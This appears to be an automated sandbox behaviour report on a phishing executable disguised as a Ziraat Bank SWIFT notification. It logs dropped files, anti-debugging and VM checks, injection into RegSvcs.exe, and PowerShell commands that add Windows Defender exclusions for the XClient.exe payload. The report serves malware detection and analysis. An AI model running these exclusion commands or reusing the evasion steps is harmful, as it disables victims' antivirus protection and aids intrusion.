Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

API coverage: 5.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\alg.exe TID: 1624	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 2348	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7192	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7284	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7792	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 6573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 3193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1084	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 2644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 5784	Thread sleep count: 56 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\alg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\build.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Windows\System32\alg.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: XClient.exe, 0000000B.00000002.2554544345.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: niellist.exe, 00000011.00000002.1410876293.0000000000A67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH_
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772258009.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987104410.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1279607006.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1301817697.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi
Source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process information queried: ProcessInformation

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_005A8594 mov eax, dword ptr fs:[00000030h]	0_2_005A8594
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD1130 mov eax, dword ptr fs:[00000030h]	0_2_00AD1130
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B13F3D mov eax, dword ptr fs:[00000030h]	0_2_00B13F3D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D711F0 mov eax, dword ptr fs:[00000030h]	0_2_00D711F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D71250 mov eax, dword ptr fs:[00000030h]	0_2_00D71250
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D6FB80 mov eax, dword ptr fs:[00000030h]	0_2_00D6FB80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA1130 mov eax, dword ptr fs:[00000030h]	3_2_00AA1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE3F3D mov eax, dword ptr fs:[00000030h]	3_2_00AE3F3D
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA2A0 mov eax, dword ptr fs:[00000030h]	3_2_00CEA2A0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA300 mov eax, dword ptr fs:[00000030h]	3_2_00CEA300
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CE8C30 mov eax, dword ptr fs:[00000030h]	3_2_00CE8C30
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFAE88 mov eax, dword ptr fs:[00000030h]	17_2_00AFAE88
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC4F8 mov eax, dword ptr fs:[00000030h]	17_2_00AFC4F8
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC558 mov eax, dword ptr fs:[00000030h]	17_2_00AFC558
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C1130 mov eax, dword ptr fs:[00000030h]	17_2_033C1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03403F3D mov eax, dword ptr fs:[00000030h]	17_2_03403F3D

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B11361
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B14C7B
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00AE1361
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00AE4C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03401361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_03401361
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03404C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_03404C7B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 941008			Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FC6008

Contains functionality to execute programs as a different user

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Contains functionality to simulate keystroke presses

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Contains functionality to simulate mouse events

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

